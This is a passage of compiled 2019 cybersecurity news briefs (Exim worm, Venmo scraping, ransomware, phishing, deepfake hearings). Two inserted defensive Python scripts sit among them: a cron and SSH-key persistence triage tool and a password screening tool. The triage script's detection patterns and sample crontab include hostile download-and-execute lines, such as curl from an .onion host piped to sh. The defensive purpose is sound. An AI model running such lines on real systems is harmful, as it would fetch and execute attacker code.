While trying to avoid the risk of escalating the situation with Russia, Perez said that this action and others taken by US cyber-ops teams are aimed at preparing the battle space with Russia, so that the US will be ready at some future point, should direct action need to be taken.

“This is also about deterrence, as we are signaling to Russia that we have the technical means and capabilities and the will to use them if we have to. As for the risk of ending up in a full-scale cyber-war, the reality is that we have been close to it with several events that have happened but remained in an economic, intelligence and influence conflict with Russia, as well as other countries, like China, Iran and, to a lesser extent, North Korea. These are low-intensity conflicts but they could escalate at any point, even without us engaging in our own offensive cyber-ops.”

Seven Million Venmo Transactions Published on GitHub

Venmo users are being advised to set their accounts to private after a computer science student scraped seven million Venmo transactions, proving that users’ public activity can be easily accessed, according to The Next Web (TNW).

Over a six-month period, Minnesota State University computer science student Dan Salmon collected a data set of more than seven million Venmo transactions, which he exported from MongoDB and published on GitHub.

“I am releasing this dataset in order to bring attention to Venmo users that all of this data is publicly available for anyone to grab without even an API key. There is some very valuable data here for any attacker conducting OSINT research,” Salmon wrote.

“I would highly encourage all users to switch their Venmo account to private by going to Settings > Privacy and selecting "Private" as well as Past Transactions > Change All to Private. Screenshot instructions are available here.”

“Transparency may often be used against the legitimate interests of end users. Probably very few of us wish to share all their payment transactions with the rest of the world even if we have nothing to hide. Venmo should explicitly and conspicuously notify all its users that their transactions are accessible by everyone unless they update their settings,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

“[The] developer’s API should be provided only to vetoed, properly verified third parties within a scope of a binding legal agreement capable of protecting users’ privacy regardless of technical flaws one may discover now or in the future,” Kolochenko said.

“Anti-scraping functionality probably requires holistic testing via an open bug bounty program, for example, to spot and remediate as many anti-automation bypasses as possible. This will not provide absolute protection but at least will considerably reduce the efficiency of data-scraping campaigns. Without all these common-sense measures, Venmo may face serious legal ramifications and severe monetary penalties in many jurisdictions, let alone disgruntled users and loss of revenue.”

In an email to Infosecurity, a Venmo spokesperson said, “Venmo was designed for sharing experiences with your friends in today’s social world, and the newsfeed has always been a big part of this. The safety and privacy of Venmo users and their information is always a top priority.

“Venmo does a number of things to keep our users informed and help them protect and control their privacy, including:

  • “The social newsfeed: When people open the app, the first thing they see is the newsfeed. This is the first step in educating users that Venmo is a social forum and the newsfeed allows you to see what others have chosen to share on Venmo and the experiences that are happening on Venmo.
  • “Users choose what to share: Like on other social apps, Venmo users can choose what they want to share and which audience they share it with. It is very clear in each payment what audience it is being shared with and we have made this even more prominent in recent years.”

Eliminate Outdated Identity Proofing, Says GAO

The remote identity proofing used by four large government agencies has been deemed outdated by a new report released by the U.S. Government Accountability Office (GAO).

According to the report, the Postal Service, Department of Veteran Affairs, Social Security Administration and the Centers for Medicare and Medicaid Services use outdated tactics to verify citizens’ data over the phone.

Of the six agencies GAO interviewed, only two have eliminated the use of knowledge-based verification methods. The remaining four government agencies rely on “consumer reporting agencies (CRAs) to conduct a procedure known as knowledge-based verification,” the report said. That is, individuals are asked questions based on information available in their credit reports.

As a result, any fraudster could potentially use information available from the 2017 Equifax breach or the latest hack of the week to answer security questions and start collecting the social security checks of vulnerable Americans or embezzling veterans’ healthcare benefits.

“The risk that an attacker could obtain and use an individual’s personal information to answer knowledge-based verification questions and impersonate that individual led the National Institute of Standards and Technology (NIST) to issue guidance in 2017 that effectively prohibits agencies from using knowledge-based verification for sensitive applications,” the report said.

In addition to cost, agencies noted additional challenges to implementation, which include “mobile device verification[, which] may not always be viable because not all applicants possess mobile devices that can be used to verify their identities. Nevertheless, until these agencies take steps to eliminate their use of knowledge-based verification, the individuals they serve will remain at increased risk of identity fraud,” the report stated.

Beyond recommending that the agencies discontinue the practice of knowledge-based verification, the GAO also recommended that NIST augment its technical guidance to include implementation guidance and assist agencies in adopting more secure authentication processes.

“It’s unfortunate that data breaches have become a part of our modern lives. But this report shows most of the damage isn’t done in the initial breach. In fact, most of the real damage comes from account takeovers by social engineering contact center agents long after the breach. Here’s the reality – hackers aren’t going away. The solution is to de-weaponize personal information. Stop relying on it for authentication,” said Pat Cox, VP and GM at Neustar.

“Identity interrogation and knowledge-based authentication, where citizens verify their identity by demonstrating knowledge of personal information, as basic as address or date of birth – information which could have been gleaned from dozens of recent data breaches – isn’t stopping identity theft.”

Microsoft Urges Azure Customers to Patch Exim Worm

Microsoft has urged Azure users to update their systems following the discovery of a major new attack campaign targeting popular email server software.

The worm, which Infosecurity reported on last week, targets mail transfer agent product Exim running on Linux-based email servers. It’s claimed that Exim is running on over half (57%) of the world’s email servers, with as many as 3.5 million vulnerable to the new attack.

In a security update on Friday, Microsoft confirmed that the attack imperils servers running Exim version 4.87 to 4.91. It said that although Azure has “controls” in place to prevent the spread of the worm, customers could still be vulnerable to infection and should update their systems as soon as possible.

“Customers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs. As this vulnerability is being actively exploited by worm activity, MSRC urges customers to observe Azure security best practices and patterns and to patch or restrict network access to VMs running the affected versions of Exim,” Microsoft explained.

“There is a partial mitigation for affected systems that can filter or block network traffic via Network Security Groups (NSGs). The affected systems can mitigate Internet-based ‘wormable’ malware or advanced malware threats that could exploit the vulnerability. However, affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker’s IP Address is permitted through Network Security Groups.”

Two waves of attack have been spotted in the wild, downloading a cryptocurrency mining payload to monetize the threat. The more sophisticated of the two uses Tor services and creates “deceiving windows icon files” to throw security teams off the scent.

As well as downloading the payload, the malware searches for additional vulnerable servers on the internet, connects to them, and infects them with the initial script, according to Cybereason.

Twitter Shuts Down 5000 State-Sponsored Accounts

Twitter has taken down nearly 5000 fake accounts, most of them apparently backed by the Iranian state, in a bid to clean the platform of government-sponsored attempts to spread propaganda.

The social network claimed in a post last week that it had closed 4779 accounts linked to Tehran, 1666 of which tweeted nearly two million times, with content “that benefited the diplomatic and geostrategic views of the Iranian state.”

Another subset of 248 accounts was engaged in discussions related to Israel, while 2865 “employed a range of false personas to target conversations about political and social issues in Iran and globally.”

Four accounts were linked to the infamous Internet Research Agency (IRA), the Kremlin-linked organization responsible for a mass disinformation campaign on social media ahead of the 2016 US Presidential election.

Also removed by Twitter during this cull were 130 fake accounts linked to organizations including Esquerra Republicana de Catalunya, which spread content designed to “inorganically influence the conversation” about Catalan independence.

Twitter closed down a further 33 accounts run by a “commercial entity” operating in Venezuela “that were engaging in platform manipulation targeted outside of the country.”

“Our Site Integrity team is dedicated to identifying and investigating suspected platform manipulation on Twitter, including potential state-backed activity. In partnership with teams across the company, we employ a range of open-source and proprietary signals and tools to identify when attempted coordinated manipulation may be taking place, as well as the actors responsible for it,” wrote Twitter head of site integrity, Yoel Roth.

“We also partner closely with governments, law enforcement, and our peer companies to improve our understanding of the actors involved in information operations and develop a holistic strategy for addressing them.”

Europol Gamifies Cryptocurrency Crime Prevention

Europol trained its members on cryptocurrency-related crime at a conference last week, announcing the development of a new game.

The cross-jurisdictional law enforcement organization claimed that over 300 experts in cryptocurrency, from both the police and private sector, attended its headquarters in The Hague for the region’s largest conference of its kind last week.

The aim was to share best practice and look at new partnership-building opportunities to combat the growth in cybercrime linked to digital currencies, as well as techniques for recovering virtual assets stolen by hackers.

At the show, Europol announced the development of a new “cryptocurrency tracing game” developed in partnership with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organised Crime Research).

Set to launch in October, the unnamed title will be the first “law enforcement training opportunity” to use gamification techniques to train officers on cryptocurrency and investigation.

“It will allow law enforcement officers to get hands-on training and advice on tracing cryptocurrencies in criminal investigations,” according to Europol.

The news comes as the popularity of illicit cryptocurrency mining appears to be waning among the cybercrime community – at least in terms of attacks on consumers.

Consumer detections of cryptojacking dropped to almost zero in Q1, thanks in part to the decision by Coinhive to shut down its operations, although attacks against businesses continue to rise, especially in APAC, Malwarebytes said last month.

Meanwhile, attacks on cryptocurrency firms continue unabated. Just last week, hackers made off with nearly $9.7m in virtual coins after a successful attack on digital wallet provider GateHub.

Among the experts at the Europol conference were representatives from: Binance, BitBay, Bitfinex, BitFlyer Europe, Bitnovo, Bitonic, Bitpanda, BitPay, Bitstamp, CEX, Coinbase, Coinfloor, Coinhouse, Coinpayments, CoinsPaid, Ledger, Litebit, LocalBitcoins, OKCoin, Shapeshift, SpectroCoin, Tether and Xapo.

They shared best practices on implementing Know Your Customer (KYC) policies and risk-based approaches to suspicious transactions, according to Europol.

US Lawmakers Hear Testimony on Concerns of Deepfakes

Days after a video of a transformed Arnold Schwarzenegger went viral on YouTube, members of the US House Intelligence Committee heard testimony on Thursday, June 13, raising concerns about the threat of “deepfakes,” according to The Hill.

In his opening remarks, committee chairman Adam Schiff said, “Advances in AI and machine learning have led to the emergence of advanced digitally doctored media, so-called ‘deepfakes’ that allow malicious actors to foment chaos, division or crisis.... Of great concern is that deepfakes could have the power to disrupt the democratic process, particularly the presidential race of 2020.”

Schiff noted that three years ago, lawmakers feared that falsified documents could be used to meddle in elections. “Three years later, we are on the cusp of a technological revolution that could enable even more sinister forms of deception.”

Of paramount concern is that foreign actors could use these deepfakes to spew misinformation through malicious campaigns intended to deceive the public or sway public opinion. Throughout the course of the more-than-two-hour hearing, the committee saw convincing examples of deepfakes and examples of synthetic pictures of people that don’t exist at all.

Former FBI special agent Clint Watts, senior fellow for the Alliance for Securing Democracy at the German Marshall Fund, was part of a four-person panel that testified before lawmakers about the potential for foreign adversaries to craft synthetic media capabilities that could be used against the US.

“The falsification of audio and video allows manipulators to dupe audience members in highly convincing ways, provoking emotional responses that can lead to widespread mistrust,” Watts warned.

It’s not only lawmakers that are worried about the potential threat of deepfakes. In a June 13 blog post, Nieman Lab looked at myriad ways that deepfakes could be used to manipulate the outcome of an election, noting that “deepfakes have the potential to wreak havoc in contexts such as news, where audio and video are treated as a form of evidence that something actually happened.

“So-called 'cheapfakes,' such as the widely circulated clip of House Speaker Nancy Pelosi, have already demonstrated the potential for low-tech manipulated video to find a ready audience. The more advanced technology creates a whole new level of speed, scale, and potential for personalization of such disinformation.”

Malware a Serious Threat for Industrial Orgs

During Q1 2019, Cryptolocker malware spiked to account for 24% of all malware used, up from only 9% in Q4 2018, according to a new report from Positive Technologies.

“This malware is often used in combination with phishing, with hackers constantly inventing new ways of deceiving users and making them pay a ransom. Healthcare has proved to be a favorite target of cryptolockers. Medical institutions are more likely to pay a ransom compared to other businesses, perhaps because of patients' lives and health being at stake,” the report stated.

“Phishing remains an effective way of delivering malware. But email is far from the only channel of malware distribution. For example, users frequently download files from torrent trackers, on which the risk of malware infection grows exponentially. Under the guise of a movie, attackers distributed malware used for spoofing addresses of bitcoin and Ethereum wallets when the information is copied from the clipboard. Users also often download programs from official app stores.”

Also up during Q1 was the number of unique threats, which exceeded the numbers from Q1 of last year by 11%. The report noted an increasing number of cases of infection using multifunctional Trojans, with attackers most often hitting government agencies (16%), medical institutions (10%) and industrial companies (10%).

“Malware combining multiple types of Trojans is becoming more and more widespread. Due to its flexible modular architecture, this malware can perform many different functions. For example, it can display advertising and steal user data at the same time,” the report said.

While Cryptolocker malware has risen, the percentage of hidden mining has decreased to 7% from the previously reported 9% in Q4 2018.

“Hackers have started to upgrade miners, turning them into multifunctional Trojans. Once inside a system with low computational power on which mining is uneconomical, such Trojans start acting as spyware and steal data,” the report said. According to the research, cyber-criminals are using self-developed spyware or hacking government websites to steal data from governments.

Canadian City Fell Prey to a $375K Phish

Yet another city has fallen victim to “a complex phishing email.” The scam cost Burlington, Ontario, Canada, C$503,000 – the equivalent of nearly US$375,000.

“On Thursday, May 23, the City of Burlington discovered it was a victim of fraud. A single transaction was made to a falsified bank account as a result of a complex phishing email to City staff requesting to change banking information for an established City vendor. The transaction was in the form of an electronic transfer of funds made to the vendor...and was processed on May 16,” the city announced.

Burlington immediately contacted law enforcement and a criminal investigation is underway, according to the announcement.

“Cyber-attacks are on the rise, and phishing emails that involve the human factor are responsible for a great number of these breaches. Organizations globally are realizing the need to invest in employee training and deploy different training solutions in the hope of mitigating the risk of data breaches,” said Shlomi Gian, CEO at CybeReady.

“Instead of increasing spending and IT effort, organizations should opt for smart solutions that guarantee change in employee behavior. Effective training should not become an IT and financial burden. Increased awareness might be the only way to reduce the risk of another incident like this in the foreseeable future.”

According to Global News Canada, none of Burlington’s systems have been impacted by the transaction. At this time, the city is not providing any additional information, but experts advise that all organizations continue to invest in their human capital via security training and awareness.

“Humans remain the weakest link in any organization. Properly implemented security controls can reduce the risk of human error but not eliminate it. Worse, cyber-criminals will now purposely target smaller organizations that cannot afford to invest in their cybersecurity,” said Ilia Kolochenko, founder and CEO of web security company ImmuniWeb.

Home Secretary Signs Assange US Extradition Request

The UK home secretary Sajid Javid has approved a US request for the extradition of WikiLeaks founder Julian Assange.

The Tory leadership hopeful told BBC Radio 4’s Today program on Thursday that the controversial figure is one step closer to a trial on US soil, where he faces an 18-count indictment.

“He’s rightly behind bars. There’s an extradition request from the US that is before the courts tomorrow but yesterday I signed the extradition order and certified it and that will be going in front of the courts tomorrow,” said Javid.

“It is a decision ultimately for the courts, but there is a very important part of it for the home secretary and I want to see justice done at all times and we’ve got a legitimate extradition request, so I’ve signed it, but the final decision is now with the courts.”

The Department of Justice initially indicted Assange on hacking offenses related to Chelsea Manning’s alleged unauthorized access of Pentagon computers to access classified information.

However, that was superseded by a new 18-count court order detailing charges related to Assange’s publishing of that classified info, which it is alleged harmed national security.

The trove of hundreds of thousands of secret diplomatic cables and other documents relating to US wars in Afghanistan and Iraq contained unredacted names of US informants and diplomats in those countries, allegedly putting their physical safety at risk.

However, press freedom advocates have warned that the charges could set a dangerous precedent, given that WikiLeaks was acting in the public interest in revealing US military cover-ups such as the accidental shooting of two Iraqis working for Reuters news agency in 2007.

It’s also claimed that as Assange is not a US citizen and his crimes were not committed on US soil, he should not be facing extradition.

Former editor of the Guardian, Alan Rusbridger, claimed the charges are “attempting to criminalize things journalists regularly do as they receive and publish true information given to them by sources or whistleblowers.”

However, Assange has also been a controversial figure: his decision to publish private emails hacked by alleged Russian state spies from Democratic Party officials is said to have given Donald Trump a key advantage in the 2016 race for the White House.  

Millions of Email Servers at Risk from Cryptomining Worm

Researchers have spotted a major new cyber-attack campaign targeting millions of Linux email servers around the world with a cryptomining malware payload.

Exim accounts for over half (57%) of the globe’s internet email servers. Over 3.5 million are at risk from a vulnerability discovered last week, CVE-2019-10149, according to security vendor Cybereason.

There appear to be two waves of attack: in the first, attackers initially pushed out exploits from a command and control (C2) server on the clear web. The second, however, seems to be more sophisticated.

“This is a highly pervasive campaign that installs cron jobs for persistence and downloads several payloads for different stages of the attack. In one of those stages, one of the payloads is a port scanner written in python. It looks for additional vulnerable servers on the internet, connects to them, and infects them with the initial script,” wrote Cybereason.

“In the attack, the attackers add an RSA authentication key to the SSH server which allows them to connect to the server as root and own it completely.”

Researchers are still working to assess the breadth of the campaign, but with worm-like capabilities in play, system administrators are urged to patch their Exim servers now, as well as find and remove any cron jobs.

“It is clear that the attackers went to great lengths to try to hide the intentions of their newly-created worm. They used hidden services on the TOR network to host their payloads and created deceiving windows icon files in an attempt to throw off researchers and even system administrators who are looking at their logs,” concluded Cybereason. 

“The prevalence of vulnerable Exim servers allows attackers to compromise many servers in a relatively short period of time, as well as generate a nice stream of cryptocurrency revenue.”
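The report above ties the worm's persistence to cron jobs and to an SSH key added for root; as an added example, not Cybereason's tooling, the script below shows how an administrator can triage crontab text for the download-and-execute idiom and list authorized_keys entries whose fingerprint is not on a known-good allowlist. All sample data in it is constructed.

```python
"""Post-compromise triage for cron and SSH-key persistence.

Added example, not Cybereason's code. Indicator patterns are heuristics chosen
for this example; the allowlist is something the administrator maintains.
"""
import base64
import binascii
import hashlib
import re
from typing import Dict, List, Optional, Set, Tuple

# Heuristic indicators for the behaviours described in the report
# (assumption: these cover the idiom; extend for your environment).
CRON_INDICATORS = {
    "downloader": re.compile(r"\b(?:curl|wget)\b"),
    "tor_hidden_service": re.compile(r"\.onion\b"),
    "pipe_to_shell": re.compile(r"\|\s*(?:ba)?sh\b"),
    "encoded_payload": re.compile(r"\bbase64\b"),
    "exec_from_tmp": re.compile(r"/(?:tmp|dev/shm|var/tmp)/\S+"),
}


def triage_cron(text: str, source: str = "crontab") -> List[Dict]:
    """Return one finding per non-comment cron line that matches any indicator."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        hits = [name for name, rx in CRON_INDICATORS.items() if rx.search(line)]
        if hits:
            findings.append({"source": source, "line": lineno,
                             "entry": line, "indicators": hits})
    return findings


def parse_authorized_key(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (key_type, SHA256 fingerprint, comment) for one authorized_keys
    entry, or None if the entry cannot be parsed. A leading options field is
    skipped; the fingerprint is the OpenSSH style base64(sha256(key blob))."""
    fields = line.split()
    for i, f in enumerate(fields):
        if f.startswith(("ssh-", "ecdsa-", "sk-")) and i + 1 < len(fields):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except (binascii.Error, ValueError):
                return None
            digest = hashlib.sha256(blob).digest()
            fp = "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
            return f, fp, " ".join(fields[i + 2:])
    return None


def triage_authorized_keys(text: str, allowlist: Set[str]) -> List[Dict]:
    """Flag every key that is unparseable or whose fingerprint is not allowlisted."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parsed = parse_authorized_key(line)
        if parsed is None:
            findings.append({"line": lineno, "fingerprint": None, "comment": "unparseable"})
            continue
        key_type, fp, comment = parsed
        if fp not in allowlist:
            findings.append({"line": lineno, "fingerprint": fp, "comment": comment})
    return findings


def _constructed_key(label: str) -> str:
    """Build a syntactically valid but meaningless authorized_keys entry."""
    blob = base64.b64encode(b"constructed blob " + label.encode()).decode()
    return f"ssh-rsa {blob} {label}"


# Constructed sample: one legitimate job followed by two suspicious entries.
SAMPLE_CRON = """\
# constructed sample crontab
0 2 * * * /usr/local/bin/backup.sh
*/10 * * * * curl -s http://example.onion/payload | sh
@reboot echo cHdkCg== | base64 -d > /tmp/.x && /tmp/.x
"""

# Constructed sample: the admin key is allowlisted, the second key is not.
KNOWN_FINGERPRINTS = {parse_authorized_key(_constructed_key("admin@bastion"))[1]}
SAMPLE_KEYS = _constructed_key("admin@bastion") + "\n" + _constructed_key("unknown") + "\n"

if __name__ == "__main__":
    for f in triage_cron(SAMPLE_CRON):
        print("cron", f["line"], f["indicators"], f["entry"])
    for f in triage_authorized_keys(SAMPLE_KEYS, KNOWN_FINGERPRINTS):
        print("ssh-key", f["line"], f["fingerprint"], f["comment"])
```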

MI5 Breached Surveillance Law for Years

MI5’s breaches of the law in its handling and retention of bulk surveillance data are much worse than first thought, according to new legal documents revealed as part of an ongoing case.

Rights group Liberty is challenging outgoing Prime Minister Theresa May’s flagship Snoopers’ Charter, aka the Investigatory Powers Act (IPA): a law which allows the security services to hack devices and intercept communications en masse, collecting and storing info on countless innocent citizens.

Last month it was revealed that MI5 had breached IPA safeguards, something home secretary Sajid Javid described as “compliance risks” that require “serious and required immediate mitigation.”

However, this week Liberty disclosed 10 further documents and letters from MI5 and watchdog the Investigatory Powers Commissioner (IPCO) detailing “undoubtedly unlawful” conduct from the security service for as long as the IPA has been in existence.

“Without seeking to be emotive, I consider that MI5’s use of warranted currently, in effect, in ‘special measures’ and the historical lack of compliance... is of such gravity that IPCO will need to be satisfied to a greater degree than usual that it is ‘fit for purpose’,” the commissioner wrote in one.

MI5 failed to safeguard citizens’ privacy by, for example, destroying material in a timely manner or protecting legally privileged material, and knew about such “compliance gaps” for three years before telling the IPCO, according to Liberty.

MI5’s false assurances extended to its maintaining to senior judges that data handling obligations were being met, resulting in warrants for bulk surveillance being issued that otherwise would not have been forthcoming.

The new evidence also revealed that personal data collected by MI5 is being stored in “ungoverned spaces,” and that the intelligence service’s lawyers claim there is “a high likelihood [of it] being discovered when it should have been deleted, in a disclosure exercise leading to substantial legal or oversight failure.”

The government is now trying to minimize the fallout from more damaging revelations by applying for further details to be provided to the court through private hearings.

“These shocking revelations expose how MI5 has been illegally mishandling our data for years, storing it when they have no legal basis to do so. This could include our most deeply sensitive information – our calls and messages, our location data, our web browsing history,” argued Liberty lawyer, Megan Goulding.

“It is unacceptable that the public is only learning now about these serious breaches after the government has been forced into revealing them in the course of Liberty’s legal challenge. In addition to showing a flagrant disregard for our rights, MI5 has attempted to hide its mistakes by providing misinformation to the Investigatory Powers Commissioner, who oversees the government’s surveillance regime.”

Employees Out of Work after ASCO Hit by Ransomware

Nearly 1,000 employees in ASCO’s Zaventem, Belgium, office have been left incapable of doing their jobs after a ransomware attack crippled the aircraft-parts manufacturer, according to a June 11 report from vrt NWS.

“From the ISF’s standpoint, everyone who has access to an organization’s information and systems should be made aware of the risks from ransomware and the actions required to minimize those risks,” said Steve Durbin, managing director of the Information Security Forum.

“The bottom line is that if you can’t do without the information and you don’t have a backup, then paying is the only option you have left to recapture your data. Therefore, prevention is the way to go to better protect yourself.”

ASCO temporarily shut down operations at its headquarters in Zaventem in the aftermath of the attack, as was reported by Data News.

Spirit AeroSystems acquired ASCO, a Belgian organization, in 2018. Spirit AeroSystems reportedly said that it would also temporarily cease production in other countries, according to a June 13 post from Tripwire.

“Initially, ASCO merely disclosed that someone had hacked its servers. It did not supply additional details at that time.... As of this writing, it’s unclear what ransomware family was responsible for the infection or how it gained access to ASCO’s network,” Tripwire’s David Bisson wrote.

“This latest ransomware attack against a critical supplier of airplane parts is another reminder on how destructive ransomware continues to be to organizations,” said Joseph Carson, chief security scientist at Thycotic.

“Ransomware, however, should be a lower risk to businesses if they follow common industry best practices such as the introduction of a solid incident response plan, backup and recovery practice, cybersecurity awareness training and strong privilege and access management controls to limit administrator access.”

“Supply chains are difficult to secure. They create risk that is hard to identify, complicated to quantify and costly to address. A compromise anywhere in the supply chain can have just as much impact on your business, your bottom line, and your reputation, as one from within the organization.”

Gaming’s All Fun and Games Till Someone Gets Hacked

Cyber-criminals are playing games with the gaming industry according to two new reports published by Akamai and Kaspersky.  

The Akamai 2019 State of the Internet/Security Web Attacks and Gaming Abuse Report found that cyber-criminals have targeted the gaming industry by carrying out 12 billion credential-stuffing attacks against gaming websites, with a total of 55 billion credential-stuffing attacks across all industries within the 17-month period analyzed in the report (November 2017–March 2019).

SQL injection (SQLi) attacks account for 65% of all web application attacks, while local file inclusion (LFI) attacks only represent 24.7%, according to the report. As SQLi attacks have grown as an attack vector, the report found that the bridge between SQLi and credential-stuffing attacks is almost a direct line.

“One reason that we believe the gaming industry is an attractive target for hackers is because criminals can easily exchange in-game items for profit,” said Martin McKeay, security researcher at Akamai and editorial director of the State of the Internet/Security Report. “Furthermore, gamers are a niche demographic known for spending money, so their financial status is also a tempting target.”

In related news, research from Kaspersky confirmed that, unfortunately, more and more video games are being used to distribute malware to unsuspecting users. According to the research, more than 930,000 users were hit by malware attacks in the last 12 months, which cyber-criminals have achieved through crafting and distributing fake copies of popular video games, including "Minecraft," "Grand Theft Auto V" and "Sims 4."

Malware-disguised "Minecraft" accounted for around 30% of attacks, with over 310,000 users hit. Coming in at a distant second place was "Grand Theft Auto V," which targeted more than 112,000 users.

According to the researchers, criminals were also found trying to lure users into downloading malicious files pretending to be unreleased games. Spoofs of at least 10 pre-release games were seen, with 80% of detections focused on "FIFA 20," "Borderlands 3," and the "Elder Scrolls 6."

“For months now we see that criminals are exploiting entertainment to catch users by surprise – be it series of popular TV shows, premieres of top movies or popular video games,” said Maria Fedorova, security researcher at Kaspersky, in a press release.

“This is easy to explain: people can be less vigilant when they just want to relax and have fun. If they’re not expecting to find malware in something fun they’ve used for years, it won’t take an advanced-threat like infection vector to succeed. We urge everyone to stay alert, avoid untrusted digital platforms and suspicious-looking offers, install security software and perform a regular security scan of all devices used for gaming.”

AGs Warn AMCA Breach Impact Rose to over 20 Million

After the data of more than 20 million patients was potentially exposed in the cyber-attack against American Medical Collection Agency (AMCA), the third-party collection agency for laboratories, hospitals, physician groups, medical providers and others, attorneys general (AGs) in states including New Jersey, Illinois, Connecticut and Maryland have started alerting citizens and looking for answers to exactly what happened.

“The healthcare industry may be the most vulnerable of all industries to cyber-attacks. It's about the data healthcare operators have access to. In the AMCA cyber-heist, data stolen included patient PII [personally identifiable information] and lab test info but also included healthcare provider info, credit/debit card info, bank account info and social security numbers. This was a ‘treasure trove’ of data to a cyber-thief,” said Jonathan Deveaux, head of enterprise data protection at comforte AG.

The third-party data breach impacted both Quest Diagnostic and LabCorp, as well as BioReference Laboratories, CareCentrix and Sunrise Laboratories. According to LabCorp’s disclosure notice, “That information could include first and last name, date of birth, address, phone, date of service, provider, and balance information. AMCA’s affected system also included credit card or bank account information that was provided by the consumer to AMCA (for those who sought to pay their balance).”

Maryland AG Brian E. Frosh warned consumers to review their financial and medical records, according to WJZ-13. “Massive data breaches like the one experienced by the AMCA are extremely alarming, especially considering the likelihood that personal, financial, and medical information may now be in the hands of thieves and scammers,” Frosh told WJZ-13. “I strongly urge consumers to take steps to ensure that their information and personal identity is protected.”

Armed with this collection of patient data, criminals are in a good position to fraudulently collect money from those patients, according to Tim Erlin, VP, product management and strategy at Tripwire. “Imagine if you received an email with accurate details about a medical bill you actually have and a link to make a payment. It only takes a handful of people to fall for this scam in order for it to be worthwhile for the criminal.”

UK Orgs Lose 2 & 1/2 Months a Year on Poor Password Management

Businesses in the UK lose an average of two-and-a-half months per year in time spent dealing with poor password management, according to new research from OneLogin.

As detailed in its report Password Practices 2019, OneLogin surveyed 600 global IT professionals to gauge how companies are protecting passwords in terms of tools, guidelines and practices.

The key findings indicated that companies spend too much time resetting passwords that users have forgotten, believe they are dramatically safer than their password practices actually suggest and have failed to move quickly to adopt the tools that solve the password problem, like SSO, SAML, OAuth and MFA.

What's more, businesses are not heeding the latest password guidelines, OneLogin claimed, specifically regarding password rotation and checking passwords against lists of commonly used passwords, compromised passwords and rainbow tables. Two thirds of those surveyed admitted they do not check passwords against common password lists, and 78% do not check employee passwords against password complexity algorithms.
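The checks the survey asks about, as an added example that is not OneLogin's code: a candidate password is screened against a common-password list (including simple variants such as "Welcome1!"), against a breach corpus queried the way a k-anonymity range API works (only a five-character SHA-1 prefix would leave the client), and against a minimal length and character-class rule. The common list and breach corpus embedded below are constructed samples, not real data.

```python
"""Password screening: common-list, breach-corpus and complexity checks.

Added example, not OneLogin's code. The lists below are constructed samples;
a real deployment would use a full common-password list and query a breach
corpus (range API or local dump) by SHA-1 prefix.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set

# Constructed sample of a "commonly used passwords" list (real lists hold millions).
COMMON_PASSWORDS: Set[str] = {"password", "123456", "qwerty", "letmein", "welcome"}

# Constructed sample of a breach corpus: password -> number of times seen.
_BREACHED_SAMPLE: Dict[str, int] = {"Passw0rd": 50000, "Summer2019!": 1203}


def sha1_hex_upper(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_ranges(breached: Dict[str, int]) -> Dict[str, Dict[str, int]]:
    """Index a breach corpus as 5-char SHA-1 prefix -> {35-char suffix: count},
    which is the shape a range-API server returns for one prefix."""
    ranges: Dict[str, Dict[str, int]] = {}
    for pw, count in breached.items():
        h = sha1_hex_upper(pw)
        ranges.setdefault(h[:5], {})[h[5:]] = count
    return ranges


BREACH_RANGES = build_ranges(_BREACHED_SAMPLE)


def breach_count(password: str, ranges: Dict[str, Dict[str, int]]) -> int:
    """k-anonymity lookup: only the prefix is looked up, the suffix match is local."""
    h = sha1_hex_upper(password)
    return ranges.get(h[:5], {}).get(h[5:], 0)


def normalize(password: str) -> str:
    """Lower-case and strip leading/trailing digits and punctuation, so that
    "Welcome1!" is compared against "welcome"."""
    return re.sub(r"^[^a-z]+|[^a-z]+$", "", password.lower())


def is_common(password: str, common: Set[str]) -> bool:
    return password.lower() in common or normalize(password) in common


def complexity_issues(password: str, min_len: int = 12) -> List[str]:
    """Minimal rule: length and at least three of four character classes."""
    issues = []
    if len(password) < min_len:
        issues.append(f"shorter than {min_len} characters")
    classes = sum(bool(re.search(p, password))
                  for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < 3:
        issues.append("fewer than 3 character classes")
    return issues


@dataclass
class ScreenResult:
    ok: bool
    reasons: List[str] = field(default_factory=list)


def screen_password(password: str,
                    common: Set[str] = COMMON_PASSWORDS,
                    ranges: Dict[str, Dict[str, int]] = BREACH_RANGES) -> ScreenResult:
    """Run all three checks; ok is True only when no check fires."""
    reasons: List[str] = []
    if is_common(password, common):
        reasons.append("common")
    n = breach_count(password, ranges)
    if n:
        reasons.append(f"breached:{n}")
    reasons.extend(complexity_issues(password))
    return ScreenResult(ok=not reasons, reasons=reasons)


if __name__ == "__main__":
    for candidate in ("Welcome1!", "Passw0rd", "correct-horse-battery-staple-42"):
        print(candidate, screen_password(candidate))
```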

Thomas Pedersen, OneLogin’s chief technology officer and founder, said: “The benefits of innovative technology to facilitate modern business practices is clearly yet to be recognized by the average UK business overwhelmed by day-to-day password management processes. Trust must be built between businesses and B2B tech vendors, as a lot of businesses are stubbornly struggling in the dark and avoiding the topic of ‘digital transformation’ to free up employee and operational efficiencies.”

Pedersen urged businesses to streamline and simplify Identity and Access Management processes by implementing SSO and MFA tools.

“By doing so they will be freeing up skilled IT professionals to focus on tasks that drive greater business value and connect dispersed workforces. Organizations that don’t, may not survive the next two to five years. The quick adoption of automated tools is key to business survival.”

“Major Flaw” Discovered in Evernote’s Chrome Extension

A major flaw has been discovered in the code of the Web Clipper Chrome extension of note-taking service Evernote.

The flaw, a universal XSS marked CVE-2019-12592 which could have allowed threat actors to extract personal information from the browser environment, was unearthed by security company Guardio and disclosed to Evernote in late May. Within a week, Evernote addressed the issue and rolled-out a complete fix.

